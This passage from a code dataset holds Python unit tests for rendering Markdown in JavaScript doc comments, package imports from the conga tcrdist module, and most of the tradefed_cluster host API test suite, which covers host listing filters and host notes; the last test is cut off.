* self.callCommand("reload", true);
*/
docCommentCmd();
''')
self.assertEqual(parsed[0].type, "semicolon")
self.assertEqual(isinstance(parsed[0].comments, list), True)
self.assertEqual(len(parsed[0].comments), 1)
self.assertEqual(parsed[0].comments[0].variant, "doc")
self.assertEqual(parsed[0].comments[0].getHtml(), '<p>Some code example:</p>\n\n<table class="highlighttable"><tr><td class="linenos"><div class="linenodiv"><pre>1</pre></div></td><td class="code"><div class="highlight"><pre><span class="nx">self</span><span class="p">.</span><span class="nx">callCommand</span><span class="p">(</span><span class="s2">"reload"</span><span class="p">,</span> <span class="kc">true</span><span class="p">);</span>\n</pre></div>\n</td></tr></table>\n')
def test_doc_markdown_code_single_inline(self):
parsed = self.process('''
/**
* Some code example: `self.callCommand("reload", true);`
*/
docCommentCmd();
''')
self.assertEqual(parsed[0].type, "semicolon")
self.assertEqual(isinstance(parsed[0].comments, list), True)
self.assertEqual(len(parsed[0].comments), 1)
self.assertEqual(parsed[0].comments[0].variant, "doc")
self.assertEqual(parsed[0].comments[0].getHtml(), '<p>Some code example: <code>self.callCommand("reload", true);</code></p>\n')
def test_doc_markdown_code_html(self):
parsed = self.process('''
/**
* ## HTML example:
*
* ```html
* <title>My Title</title>
* <link rel="stylesheet" type="text/css" src="style.css"/>
* <script type="text/javascript">alert("Loaded");</script>
* ```
*/
docCommentCmd();
''')
self.assertEqual(parsed[0].type, "semicolon")
self.assertEqual(isinstance(parsed[0].comments, list), True)
self.assertEqual(len(parsed[0].comments), 1)
self.assertEqual(parsed[0].comments[0].variant, "doc")
self.assertEqual(parsed[0].comments[0].getHtml(), '<h2>HTML example:</h2>\n\n<table class="highlighttable"><tr><td class="linenos"><div class="linenodiv"><pre>1\n2\n3</pre></div></td><td class="code"><div class="highlight"><pre><span class="nt"><title></span>My Title<span class="nt"></title></span>\n<span class="nt"><link</span> <span class="na">rel=</span><span class="s">"stylesheet"</span> <span class="na">type=</span><span class="s">"text/css"</span> <span class="na">src=</span><span class="s">"style.css"</span><span class="nt">/></span>\n<span class="nt"><script </span><span class="na">type=</span><span class="s">"text/javascript"</span><span class="nt">></span><span class="nx">alert</span><span class="p">(</span><span class="s2">"Loaded"</span><span class="p">);</span><span class="nt"></script></span>\n</pre></div>\n</td></tr></table>\n')
if __name__ == '__main__':
logging.getLogger().setLevel(logging.ERROR)
suite = unittest.TestLoader().loadTestsFromTestCase(Tests)
unittest.TextTestRunner(verbosity=2).run(suite)
# conga/tcrdist/__init__.py (sschattgen/conga-dev, MIT)
from . import make_tcr_logo
from . import tcr_distances
from . import make_10x_clones_file
# tradefed_cluster/cluster_host_api_test.py (maksonlee/tradefed_cluster, Apache-2.0)

# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for cluster_host_api."""
import datetime
import unittest
import mock
from protorpc import protojson
from tradefed_cluster.util import ndb_shim as ndb
from tradefed_cluster import api_messages
from tradefed_cluster import api_test
from tradefed_cluster import common
from tradefed_cluster import cluster_host_api
from tradefed_cluster import datastore_entities
from tradefed_cluster import datastore_test_util
from tradefed_cluster import device_manager
from tradefed_cluster import note_manager
class ClusterHostApiTest(api_test.ApiTest):
TIMESTAMP = datetime.datetime(2015, 10, 9)
def setUp(self):
api_test.ApiTest.setUp(self)
self.ndb_host_0 = datastore_test_util.CreateHost(
cluster='free',
hostname='host_0',
timestamp=self.TIMESTAMP,
host_state=api_messages.HostState.RUNNING,
device_count_timestamp=self.TIMESTAMP,
device_count_summaries=[
datastore_test_util.CreateDeviceCountSummary(
run_target='run_target1', available=3, allocated=7)
],
pools=['pool_1'])
self.ndb_device_0 = datastore_test_util.CreateDevice(
cluster='free',
hostname='host_0',
device_serial='device_0',
device_type=api_messages.DeviceTypeMessage.EMULATOR,
battery_level='100',
hidden=True)
self.ndb_device_1 = datastore_test_util.CreateDevice(
cluster='free',
hostname='host_0',
device_serial='device_1',
device_type=api_messages.DeviceTypeMessage.EMULATOR,
timestamp=self.TIMESTAMP)
self.ndb_host_1 = datastore_test_util.CreateHost(
cluster='paid',
hostname='host_1',
device_count_timestamp=self.TIMESTAMP,
timestamp=self.TIMESTAMP,
hidden=True,
device_count_summaries=[
datastore_test_util.CreateDeviceCountSummary(
run_target='run_target1', available=1, allocated=1)
])
self.ndb_device_2 = datastore_test_util.CreateDevice(
cluster='paid',
hostname='host_1',
device_serial='device_2',
device_type=api_messages.DeviceTypeMessage.EMULATOR,
hidden=True)
self.ndb_device_3 = datastore_test_util.CreateDevice(
cluster='paid',
hostname='host_1',
device_serial='device_3',
device_type=api_messages.DeviceTypeMessage.EMULATOR,
hidden=True)
self.ndb_host_2 = datastore_test_util.CreateHost(
cluster='free',
hostname='host_2',
lab_name='alab',
assignee='auser',
device_count_timestamp=self.TIMESTAMP,
timestamp=self.TIMESTAMP,
device_count_summaries=[
datastore_test_util.CreateDeviceCountSummary(
run_target='run_target1', offline=4, available=0, allocated=1)
])
self.ndb_host_3 = datastore_test_util.CreateHost(
cluster='paid', hostname='host_3', lab_name='alab',
timestamp=self.TIMESTAMP)
self.note = datastore_entities.Note(
type=common.NoteType.HOST_NOTE,
hostname='host_0',
user='user0',
timestamp=self.TIMESTAMP,
message='Hello, World')
self.note.put()
def AssertEqualHostInfo(self, host_entity, host_message):
# Helper to compare host entities and messages
self.assertEqual(host_entity.hostname, host_message.hostname)
self.assertEqual(host_entity.total_devices, host_message.total_devices)
self.assertEqual(host_entity.offline_devices, host_message.offline_devices)
self.assertEqual(host_entity.available_devices,
host_message.available_devices)
self.assertEqual(host_entity.allocated_devices,
host_message.allocated_devices)
self.assertEqual(host_entity.device_count_timestamp,
host_message.device_count_timestamp)
self.assertEqual(host_entity.physical_cluster, host_message.cluster)
self.assertEqual(host_entity.hidden, host_message.hidden)
self.assertEqual(host_entity.test_harness_version,
host_message.test_runner_version)
self.assertEqual(host_entity.test_harness, host_message.test_runner)
self.assertEqual(host_entity.test_harness_version,
host_message.test_harness_version)
self.assertEqual(host_entity.test_harness, host_message.test_harness)
def testListHosts(self):
"""Tests ListHosts returns all visible hosts."""
api_request = {}
api_response = self.testapp.post_json('/_ah/api/ClusterHostApi.ListHosts',
api_request)
host_collection = protojson.decode_message(api_messages.HostInfoCollection,
api_response.body)
self.assertEqual('200 OK', api_response.status)
self.assertEqual(3, len(host_collection.host_infos))
for host in host_collection.host_infos:
self.assertEqual(0, len(host.device_infos))
if host.hostname == 'host_0':
self.AssertEqualHostInfo(self.ndb_host_0, host)
elif host.hostname == 'host_2':
self.AssertEqualHostInfo(self.ndb_host_2, host)
elif host.hostname == 'host_3':
self.AssertEqualHostInfo(self.ndb_host_3, host)
else:
# host_1 is hidden and should not be reported
self.fail()
def testListHosts_shouldContainDevices(self):
"""Tests ListHosts returns hosts and include visible devices."""
api_request = {'include_devices': True}
api_response = self.testapp.post_json('/_ah/api/ClusterHostApi.ListHosts',
api_request)
host_collection = protojson.decode_message(api_messages.HostInfoCollection,
api_response.body)
self.assertEqual('200 OK', api_response.status)
for host in host_collection.host_infos:
if host.hostname == 'host_0':
self.AssertEqualHostInfo(self.ndb_host_0, host)
self.assertEqual(1, len(host.device_infos))
elif host.hostname == 'host_2':
self.AssertEqualHostInfo(self.ndb_host_2, host)
self.assertEqual(0, len(host.device_infos))
elif host.hostname == 'host_3':
self.AssertEqualHostInfo(self.ndb_host_3, host)
self.assertEqual(0, len(host.device_infos))
else:
# host_1 is hidden and should not be reported
self.fail()
def testListHosts_includeHidden(self):
"""Tests ListHosts returns all hosts includding hidden and devices."""
api_request = {'include_hidden': True, 'include_devices': True}
api_response = self.testapp.post_json('/_ah/api/ClusterHostApi.ListHosts',
api_request)
host_collection = protojson.decode_message(api_messages.HostInfoCollection,
api_response.body)
self.assertEqual('200 OK', api_response.status)
self.assertEqual(4, len(host_collection.host_infos))
for host in host_collection.host_infos:
if host.hostname == 'host_0':
self.AssertEqualHostInfo(self.ndb_host_0, host)
self.assertEqual(2, len(host.device_infos))
elif host.hostname == 'host_1':
self.AssertEqualHostInfo(self.ndb_host_1, host)
self.assertEqual(2, len(host.device_infos))
elif host.hostname == 'host_2':
self.AssertEqualHostInfo(self.ndb_host_2, host)
self.assertEqual(0, len(host.device_infos))
elif host.hostname == 'host_3':
self.AssertEqualHostInfo(self.ndb_host_3, host)
else:
self.fail()
def testListHosts_withOffset(self):
"""Tests ListHosts returns hosts for a count and offset."""
api_request = {'count': '1'}
api_response = self.testapp.post_json('/_ah/api/ClusterHostApi.ListHosts',
api_request)
host_collection = protojson.decode_message(api_messages.HostInfoCollection,
api_response.body)
self.assertEqual('200 OK', api_response.status)
self.assertEqual(1, len(host_collection.host_infos))
self.assertEqual(0, len(host_collection.host_infos[0].device_infos))
def testListHosts_withCursorAndOffset(self):
"""Tests ListHosts returns hosts for a count and offset."""
api_request = {'count': '2'}
api_response = self.testapp.post_json('/_ah/api/ClusterHostApi.ListHosts',
api_request)
host_collection = protojson.decode_message(api_messages.HostInfoCollection,
api_response.body)
self.assertEqual('200 OK', api_response.status)
self.assertTrue(host_collection.more)
cursor = host_collection.next_cursor
self.assertIsNotNone(cursor)
self.assertEqual(2, len(host_collection.host_infos))
self.assertEqual('host_0', host_collection.host_infos[0].hostname)
self.assertEqual('host_2', host_collection.host_infos[1].hostname)
self.assertEqual(0, len(host_collection.host_infos[0].device_infos))
api_request = {'count': '2', 'cursor': cursor}
api_response = self.testapp.post_json('/_ah/api/ClusterHostApi.ListHosts',
api_request)
host_collection = protojson.decode_message(api_messages.HostInfoCollection,
api_response.body)
self.assertEqual('200 OK', api_response.status)
self.assertFalse(host_collection.more)
self.assertIsNone(host_collection.next_cursor)
self.assertEqual(1, len(host_collection.host_infos))
self.assertEqual('host_3', host_collection.host_infos[0].hostname)
def testListHosts_withDevicesOffset(self):
"""Tests ListHosts returns hosts with devices for a count and offset."""
api_request = {'include_devices': True, 'count': '1'}
api_response = self.testapp.post_json('/_ah/api/ClusterHostApi.ListHosts',
api_request)
host_collection = protojson.decode_message(api_messages.HostInfoCollection,
api_response.body)
self.assertEqual('200 OK', api_response.status)
self.assertEqual(1, len(host_collection.host_infos))
self.assertEqual(1, len(host_collection.host_infos[0].device_infos))
def testListHosts_includeHiddenWithCount(self):
"""Tests ListHosts includes hidden applying a count and offset."""
api_request = {'include_hidden': True, 'count': '1'}
api_response = self.testapp.post_json('/_ah/api/ClusterHostApi.ListHosts',
api_request)
host_collection = protojson.decode_message(api_messages.HostInfoCollection,
api_response.body)
self.assertEqual('200 OK', api_response.status)
self.assertEqual(1, len(host_collection.host_infos))
self.assertEqual(0, len(host_collection.host_infos[0].device_infos))
def testListHosts_includeHiddenWithDevicesCount(self):
"""Tests ListHosts includes hidden applying a count and offset."""
api_request = {
'include_devices': True,
'include_hidden': True,
'count': '1'
}
api_response = self.testapp.post_json('/_ah/api/ClusterHostApi.ListHosts',
api_request)
host_collection = protojson.decode_message(api_messages.HostInfoCollection,
api_response.body)
self.assertEqual('200 OK', api_response.status)
self.assertEqual(1, len(host_collection.host_infos))
self.assertEqual(2, len(host_collection.host_infos[0].device_infos))
def testListHosts_filterByLab(self):
"""Tests ListHosts returns hosts the under a lab."""
api_request = {'lab_name': 'alab'}
api_response = self.testapp.post_json('/_ah/api/ClusterHostApi.ListHosts',
api_request)
host_collection = protojson.decode_message(api_messages.HostInfoCollection,
api_response.body)
self.assertEqual('200 OK', api_response.status)
self.assertEqual(2, len(host_collection.host_infos))
for host in host_collection.host_infos:
self.assertEqual('alab', host.lab_name)
def testListHosts_filterByAssignee(self):
"""Tests ListHosts returns hosts that assign to certain user."""
api_request = {'assignee': 'auser'}
api_response = self.testapp.post_json('/_ah/api/ClusterHostApi.ListHosts',
api_request)
host_collection = protojson.decode_message(api_messages.HostInfoCollection,
api_response.body)
self.assertEqual('200 OK', api_response.status)
self.assertEqual(1, len(host_collection.host_infos))
for host in host_collection.host_infos:
self.assertEqual('auser', host.assignee)
def testListHosts_filterByIsBad(self):
"""Tests ListHosts returns hosts that is bad."""
api_request = {'is_bad': True}
api_response = self.testapp.post_json('/_ah/api/ClusterHostApi.ListHosts',
api_request)
host_collection = protojson.decode_message(api_messages.HostInfoCollection,
api_response.body)
self.assertEqual('200 OK', api_response.status)
self.assertEqual(1, len(host_collection.host_infos))
for host in host_collection.host_infos:
self.assertTrue(host.is_bad)
def testListHosts_filterByHostGroups(self):
"""Tests ListHosts returns hosts the under host groups."""
api_request = {'host_groups': ['paid']}
api_response = self.testapp.post_json('/_ah/api/ClusterHostApi.ListHosts',
api_request)
host_collection = protojson.decode_message(api_messages.HostInfoCollection,
api_response.body)
self.assertEqual('200 OK', api_response.status)
self.assertEqual(1, len(host_collection.host_infos))
for host in host_collection.host_infos:
self.assertEqual('paid', host.host_group)
def testListHosts_filterByHostnames(self):
"""Tests ListHosts returns hosts the under hostnames."""
api_request = {'hostnames': ['host_2']}
api_response = self.testapp.post_json('/_ah/api/ClusterHostApi.ListHosts',
api_request)
host_collection = protojson.decode_message(api_messages.HostInfoCollection,
api_response.body)
self.assertEqual('200 OK', api_response.status)
self.assertEqual(1, len(host_collection.host_infos))
for host in host_collection.host_infos:
self.assertEqual('host_2', host.hostname)
def testListHosts_filterByTestHarness(self):
"""Tests ListHosts returns hosts the under a test harness."""
mh_host = datastore_test_util.CreateHost(
cluster='mh_cluster',
hostname='mh_host',
lab_name='mh_lab',
test_harness='MH',
test_harness_version='v1')
mh_host.put()
api_request = {'test_harness': 'MH'}
api_response = self.testapp.post_json('/_ah/api/ClusterHostApi.ListHosts',
api_request)
host_collection = protojson.decode_message(api_messages.HostInfoCollection,
api_response.body)
self.assertEqual('200 OK', api_response.status)
self.assertEqual(1, len(host_collection.host_infos))
self.AssertEqualHostInfo(mh_host, host_collection.host_infos[0])
def testListHosts_filterByMultiTestHarness(self):
"""Tests ListHosts returns hosts the under multi test harness."""
mh_host = datastore_test_util.CreateHost(
cluster='mh_cluster',
hostname='mh_host',
lab_name='mh_lab',
test_harness='MH',
test_harness_version='v1')
mh_host.put()
goats_host = datastore_test_util.CreateHost(
cluster='goats_cluster',
hostname='goats_host',
lab_name='goats_lab',
test_harness='GOATS',
test_harness_version='v3.2')
goats_host.put()
api_request = {'test_harness': ['MH', 'TRADEFED']}
api_response = self.testapp.post_json('/_ah/api/ClusterHostApi.ListHosts',
api_request)
host_collection = protojson.decode_message(api_messages.HostInfoCollection,
api_response.body)
self.assertEqual('200 OK', api_response.status)
self.assertEqual(4, len(host_collection.host_infos))
def testListHosts_filterByMultiTestHarnessVersions(self):
"""Tests ListHosts returns hosts the under multi test harness versions."""
mh_host = datastore_test_util.CreateHost(
cluster='mh_cluster',
hostname='mh_host',
lab_name='mh_lab',
test_harness='MH',
test_harness_version='v1')
mh_host.put()
goats_host = datastore_test_util.CreateHost(
cluster='goats_cluster',
hostname='goats_host',
lab_name='goats_lab',
test_harness='GOATS',
test_harness_version='v3.2')
goats_host.put()
api_request = {'test_harness_versions': ['v1', 'v3.2']}
api_response = self.testapp.post_json('/_ah/api/ClusterHostApi.ListHosts',
api_request)
host_collection = protojson.decode_message(api_messages.HostInfoCollection,
api_response.body)
self.assertEqual('200 OK', api_response.status)
self.assertEqual(2, len(host_collection.host_infos))
def testListHosts_filterByPools(self):
"""Tests ListHosts returns hosts the under pools."""
api_request = {'pools': ['pool_1']}
api_response = self.testapp.post_json('/_ah/api/ClusterHostApi.ListHosts',
api_request)
host_collection = protojson.decode_message(api_messages.HostInfoCollection,
api_response.body)
self.assertEqual('200 OK', api_response.status)
self.assertEqual(1, len(host_collection.host_infos))
for host in host_collection.host_infos:
self.assertIn('pool_1', host.pools)
def testListHosts_filterByHostStates(self):
"""Tests ListHosts returns hosts the under host states."""
host_4 = datastore_test_util.CreateHost(
cluster='paid',
hostname='host_4',
lab_name='alab',
host_state=api_messages.HostState.KILLING,
)
host_4.put()
api_request = {'host_states': ['KILLING', 'RUNNING']}
api_response = self.testapp.post_json('/_ah/api/ClusterHostApi.ListHosts',
api_request)
host_collection = protojson.decode_message(api_messages.HostInfoCollection,
api_response.body)
self.assertEqual('200 OK', api_response.status)
self.assertEqual(2, len(host_collection.host_infos))
self.assertEqual('RUNNING', host_collection.host_infos[0].host_state)
self.assertEqual('KILLING', host_collection.host_infos[1].host_state)
def testListHosts_filterByHostUpdateStates(self):
"""Tests ListHosts returns hosts the under host update states."""
datastore_test_util.CreateHostUpdateState(
'host_0', state=api_messages.HostUpdateState.SUCCEEDED)
datastore_test_util.CreateHostUpdateState(
'host_2', state=api_messages.HostUpdateState.ERRORED)
api_request = {'host_update_states': ['SUCCEEDED', 'ERRORED']}
api_response = self.testapp.post_json('/_ah/api/ClusterHostApi.ListHosts',
api_request)
host_collection = protojson.decode_message(api_messages.HostInfoCollection,
api_response.body)
self.assertEqual('200 OK', api_response.status)
self.assertEqual(2, len(host_collection.host_infos))
self.assertEqual('SUCCEEDED', host_collection.host_infos[0].update_state)
self.assertEqual('ERRORED', host_collection.host_infos[1].update_state)
def testListHosts_filterByExtraInfo(self):
"""Tests ListHosts returns hosts the under extra info."""
extra_info_0 = {}
extra_info_0['url'] = 'abc.com'
extra_info_0['host_ip'] = '1.2.3.4'
host_01 = datastore_test_util.CreateHost(
cluster='free',
hostname='host_01',
host_state=api_messages.HostState.RUNNING,
extra_info=extra_info_0)
api_request = {'flated_extra_info': 'host_ip:1.2.3.4'}
api_response = self.testapp.post_json('/_ah/api/ClusterHostApi.ListHosts',
api_request)
host_collection = protojson.decode_message(api_messages.HostInfoCollection,
api_response.body)
self.assertEqual('200 OK', api_response.status)
self.assertEqual(1, len(host_collection.host_infos))
self.assertEqual(host_collection.host_infos[0].hostname, host_01.hostname)
def testListHosts_filterByTimestamp(self):
"""Tests ListHosts can filter by timestmap."""
self.ndb_host_0.timestamp = datetime.datetime(2020, 8, 8, 12, 13)
self.ndb_host_0.put()
api_request = {
'timestamp_operator': 'LESS_THAN',
'timestamp': '2020-8-7T12:20:30'
}
api_response = self.testapp.post_json('/_ah/api/ClusterHostApi.ListHosts',
api_request)
host_collection = protojson.decode_message(api_messages.HostInfoCollection,
api_response.body)
self.assertEqual('200 OK', api_response.status)
self.assertEqual(2, len(host_collection.host_infos))
for host in host_collection.host_infos:
if host.hostname == 'host_2':
self.AssertEqualHostInfo(self.ndb_host_2, host)
elif host.hostname == 'host_3':
self.AssertEqualHostInfo(self.ndb_host_3, host)
else:
# host_1 is hidden and should not be reported
self.fail()
def testListHosts_invalidTimestampFilter(self):
"""Tests ListHosts with invalid timestmap filter."""
api_request = {
'timestamp_operator': 'LESS_THAN',
}
api_response = self.testapp.post_json('/_ah/api/ClusterHostApi.ListHosts',
api_request, expect_errors=True)
self.assertEqual('400 Bad Request', api_response.status)
def testListHosts_filterByRecoveryState(self):
"""Tests ListHosts returns hosts for certain recovery states."""
self.ndb_host_0.recovery_state = common.RecoveryState.ASSIGNED
self.ndb_host_0.assignee = 'user1'
self.ndb_host_0.put()
self.ndb_host_2.recovery_state = common.RecoveryState.FIXED
self.ndb_host_2.assignee = 'user1'
self.ndb_host_2.put()
api_request = {'recovery_states': ['ASSIGNED', 'FIXED']}
api_response = self.testapp.post_json('/_ah/api/ClusterHostApi.ListHosts',
api_request)
host_collection = protojson.decode_message(api_messages.HostInfoCollection,
api_response.body)
self.assertEqual('200 OK', api_response.status)
self.assertEqual(2, len(host_collection.host_infos))
self.assertEqual('ASSIGNED', host_collection.host_infos[0].recovery_state)
self.assertEqual('FIXED', host_collection.host_infos[1].recovery_state)
def testListHosts_includeHostUpdateState(self):
display_message_0 = 'some display message.'
host_update_state_0 = datastore_entities.HostUpdateState(
id=self.ndb_host_0.hostname,
hostname=self.ndb_host_0.hostname,
state=api_messages.HostUpdateState.SYNCING,
display_message=display_message_0)
host_update_state_2 = datastore_entities.HostUpdateState(
id=self.ndb_host_2.hostname,
hostname=self.ndb_host_2.hostname,
state=api_messages.HostUpdateState.RESTARTING)
ndb.put_multi(
[host_update_state_0, host_update_state_2])
api_request = {}
api_response = self.testapp.post_json('/_ah/api/ClusterHostApi.ListHosts',
api_request)
host_collection = protojson.decode_message(api_messages.HostInfoCollection,
api_response.body)
self.assertEqual('200 OK', api_response.status)
self.assertEqual(3, len(host_collection.host_infos))
for host in host_collection.host_infos:
self.assertEqual(0, len(host.device_infos))
if host.hostname == 'host_0':
self.AssertEqualHostInfo(self.ndb_host_0, host)
self.assertEqual('SYNCING', host.update_state)
self.assertEqual(display_message_0, host.update_state_display_message)
elif host.hostname == 'host_2':
self.AssertEqualHostInfo(self.ndb_host_2, host)
self.assertEqual('RESTARTING', host.update_state)
self.assertIsNone(host.update_state_display_message)
elif host.hostname == 'host_3':
self.AssertEqualHostInfo(self.ndb_host_3, host)
self.assertIsNone(host.update_state)
else:
# host_1 is hidden and should not be reported
self.fail()
@mock.patch.object(note_manager, 'PublishMessage')
def testAddOrUpdateHostNote_addWithTextOfflineReasonAndRecoveryAction(
self, mock_publish_host_note_message):
"""Tests adding a non-existing host note."""
lab_name = 'lab-name-1'
api_request = {
'hostname': self.ndb_host_0.hostname,
'user': 'user-1',
'message': 'message-1',
'offline_reason': 'offline-reason-1',
'recovery_action': 'recovery-action-1',
'lab_name': lab_name,
'event_time': self.TIMESTAMP.isoformat(),
}
api_response = self.testapp.post_json(
'/_ah/api/ClusterHostApi.AddOrUpdateNote', api_request)
self.assertEqual('200 OK', api_response.status)
host_note = protojson.decode_message(api_messages.Note,
api_response.body)
host_note_event = api_messages.NoteEvent(
note=host_note, lab_name=lab_name)
# Assert datastore id is generated.
self.assertIsNotNone(host_note.id)
# Assert fields equal.
self.assertEqual(api_request['hostname'], host_note.hostname)
self.assertEqual(api_request['user'], host_note.user)
self.assertEqual(api_request['message'], host_note.message)
self.assertEqual(api_request['offline_reason'], host_note.offline_reason)
self.assertEqual(api_request['recovery_action'], host_note.recovery_action)
self.assertEqual(api_request['event_time'],
host_note.event_time.isoformat())
# Assert PredefinedMessage entities are written into datastore.
self.assertIsNotNone(datastore_entities.PredefinedMessage.query().filter(
datastore_entities.PredefinedMessage.content ==
api_request['offline_reason']).get())
self.assertIsNotNone(datastore_entities.PredefinedMessage.query().filter(
datastore_entities.PredefinedMessage.content ==
api_request['recovery_action']).get())
# Side Effect: Assert HostInfoHistory is written into datastore.
histories = list(
datastore_entities.HostInfoHistory.query(
datastore_entities.HostInfoHistory.hostname ==
self.ndb_host_0.hostname).fetch())
self.assertEqual(1, len(histories))
self.assertEqual(int(host_note.id), histories[0].extra_info['host_note_id'])
mock_publish_host_note_message.assert_called_once_with(
host_note_event, common.PublishEventType.HOST_NOTE_EVENT)
@mock.patch.object(note_manager, 'PublishMessage')
def testAddOrUpdateHostNote_addWithTextOfflineReasonAndRecoveryActionNoLab(
self, mock_publish_host_note_message):
"""Tests adding a non-existing host note."""
api_request = {
'hostname': self.ndb_host_0.hostname,
'user': 'user-1',
'message': 'message-1',
'offline_reason': 'offline-reason-1',
'recovery_action': 'recovery-action-1',
'event_time': self.TIMESTAMP.isoformat(),
}
api_response = self.testapp.post_json(
'/_ah/api/ClusterHostApi.AddOrUpdateNote', api_request)
self.assertEqual('200 OK', api_response.status)
host_note = protojson.decode_message(api_messages.Note,
api_response.body)
host_note_event = api_messages.NoteEvent(note=host_note)
# Assert datastore id is generated.
self.assertIsNotNone(host_note.id)
# Assert fields equal.
self.assertEqual(api_request['hostname'], host_note.hostname)
self.assertEqual(api_request['user'], host_note.user)
self.assertEqual(api_request['message'], host_note.message)
self.assertEqual(api_request['offline_reason'], host_note.offline_reason)
self.assertEqual(api_request['recovery_action'], host_note.recovery_action)
self.assertEqual(api_request['event_time'],
host_note.event_time.isoformat())
# Assert PredefinedMessage entities are written into datastore.
self.assertIsNotNone(datastore_entities.PredefinedMessage.query().filter(
datastore_entities.PredefinedMessage.content ==
api_request['offline_reason']).get())
self.assertIsNotNone(datastore_entities.PredefinedMessage.query().filter(
datastore_entities.PredefinedMessage.content ==
api_request['recovery_action']).get())
# Side Effect: Assert HostInfoHistory is written into datastore.
histories = list(
datastore_entities.HostInfoHistory.query(
datastore_entities.HostInfoHistory.hostname ==
self.ndb_host_0.hostname).fetch())
self.assertEqual(1, len(histories))
self.assertEqual(int(host_note.id), histories[0].extra_info['host_note_id'])
mock_publish_host_note_message.assert_called_once_with(
host_note_event, common.PublishEventType.HOST_NOTE_EVENT)
@mock.patch.object(note_manager, 'PublishMessage')
def testAddOrUpdateHostNote_updateWithTextOfflineReasonAndRecoveryAction(
self, mock_publish_host_note_message):
"""Tests updating an existing host note."""
api_request_1 = {
'hostname': self.ndb_host_0.hostname,
'user': 'user-1',
'message': 'message-1',
'offline_reason': 'offline-reason-1',
'recovery_action': 'recovery-action-1',
'lab_name': 'lab-name-1',
'event_time': self.TIMESTAMP.isoformat(),
}
api_response_1 = self.testapp.post_json(
'/_ah/api/ClusterHostApi.AddOrUpdateNote', api_request_1)
self.assertEqual('200 OK', api_response_1.status)
host_note_1 = protojson.decode_message(api_messages.Note,
api_response_1.body)
new_lab_name = 'lab-name-2'
api_request_2 = {
'id': int(host_note_1.id),
'hostname': self.ndb_host_0.hostname,
'user': 'user-2',
'message': 'message-2',
'offline_reason': 'offline-reason-2',
'recovery_action': 'recovery-action-2',
'lab_name': new_lab_name,
'event_time': self.TIMESTAMP.isoformat(),
}
api_response_2 = self.testapp.post_json(
'/_ah/api/ClusterHostApi.AddOrUpdateNote', api_request_2)
self.assertEqual('200 OK', api_response_2.status)
host_note_2 = protojson.decode_message(api_messages.Note,
api_response_2.body)
host_note_event = api_messages.NoteEvent(
note=host_note_2, lab_name=new_lab_name)
# Assert the two requests modified the same datastore entity.
self.assertEqual(host_note_1.id, host_note_2.id)
# Assert the fields now match those in the second request.
self.assertEqual(api_request_2['hostname'], host_note_2.hostname)
self.assertEqual(api_request_2['user'], host_note_2.user)
self.assertEqual(api_request_2['message'], host_note_2.message)
self.assertEqual(api_request_2['offline_reason'],
host_note_2.offline_reason)
self.assertEqual(api_request_2['recovery_action'],
host_note_2.recovery_action)
self.assertEqual(api_request_2['event_time'],
host_note_2.event_time.isoformat())
# Side Effect: Assert HostInfoHistory is written into datastore.
histories = list(
datastore_entities.HostInfoHistory.query(
datastore_entities.HostInfoHistory.hostname ==
self.ndb_host_0.hostname).fetch())
self.assertEqual(1, len(histories))
self.assertEqual(int(host_note_1.id),
histories[0].extra_info['host_note_id'])
mock_publish_host_note_message.assert_called_with(
host_note_event, common.PublishEventType.HOST_NOTE_EVENT)

@mock.patch.object(note_manager, 'PublishMessage')
def testAddOrUpdateHostNote_UpdateWithDedupTextPredefinedMessage(
self, mock_publish_host_note_message):
"""Tests that updating a host note dedupes text predefined messages."""
api_request_1 = {
'hostname': self.ndb_host_0.hostname,
'user': 'user-1',
'message': 'message-1',
'offline_reason': 'offline-reason-1',
'recovery_action': 'recovery-action-1',
'lab_name': 'lab-name-1',
'event_time': self.TIMESTAMP.isoformat(),
}
api_response_1 = self.testapp.post_json(
'/_ah/api/ClusterHostApi.AddOrUpdateNote', api_request_1)
self.assertEqual('200 OK', api_response_1.status)
host_note_1 = protojson.decode_message(api_messages.Note,
api_response_1.body)
api_request_2 = {
'id': int(host_note_1.id),
'hostname': self.ndb_host_0.hostname,
'user': 'user-2',
'message': 'message-2',
'offline_reason': 'offline-reason-1',
'recovery_action': 'recovery-action-1',
'lab_name': 'lab-name-1',
'event_time': self.TIMESTAMP.isoformat(),
}
api_response_2 = self.testapp.post_json(
'/_ah/api/ClusterHostApi.AddOrUpdateNote', api_request_2)
self.assertEqual('200 OK', api_response_2.status)
host_note_2 = protojson.decode_message(api_messages.Note,
api_response_2.body)
# Assert the two requests modified the same datastore entity.
self.assertEqual(host_note_1.id, host_note_2.id)
# Assert the fields now match those in the second request.
self.assertEqual(api_request_2['hostname'],
host_note_2.hostname)
self.assertEqual(api_request_2['user'], host_note_2.user)
self.assertEqual(api_request_2['message'], host_note_2.message)
self.assertEqual(api_request_2['offline_reason'],
host_note_2.offline_reason)
self.assertEqual(api_request_2['recovery_action'],
host_note_2.recovery_action)
self.assertEqual(api_request_2['event_time'],
host_note_2.event_time.isoformat())
# Side Effect: Assert the PredefinedMessages are created only by the first
# call, so the second call does not add duplicates.
predefined_messages = list(datastore_entities.PredefinedMessage.query(
datastore_entities.PredefinedMessage.lab_name == 'lab-name-1').fetch())
self.assertEqual(2, len(predefined_messages))

@mock.patch.object(note_manager, 'PublishMessage')
def testAddOrUpdateHostNote_addWithIdOfflineReasonAndRecoveryAction(
self, mock_publish_host_note_message):
"""Tests adding a host note with existing predefined messages."""
offline_reason = 'offline-reason'
recovery_action = 'recovery-action'
lab_name = 'lab-name'
predefined_message_entities = [
datastore_entities.PredefinedMessage(
key=ndb.Key(datastore_entities.PredefinedMessage, 111),
lab_name=lab_name,
type=api_messages.PredefinedMessageType.HOST_OFFLINE_REASON,
content=offline_reason,
used_count=2),
datastore_entities.PredefinedMessage(
key=ndb.Key(datastore_entities.PredefinedMessage, 222),
lab_name=lab_name,
type=api_messages.PredefinedMessageType.HOST_RECOVERY_ACTION,
content=recovery_action,
used_count=5),
]
offline_reason_key, recovery_action_key = ndb.put_multi(
predefined_message_entities)
api_request = {
'hostname': self.ndb_host_0.hostname,
'user': 'user-1',
'message': 'message-1',
'offline_reason_id': 111,
'recovery_action_id': 222,
'lab_name': lab_name,
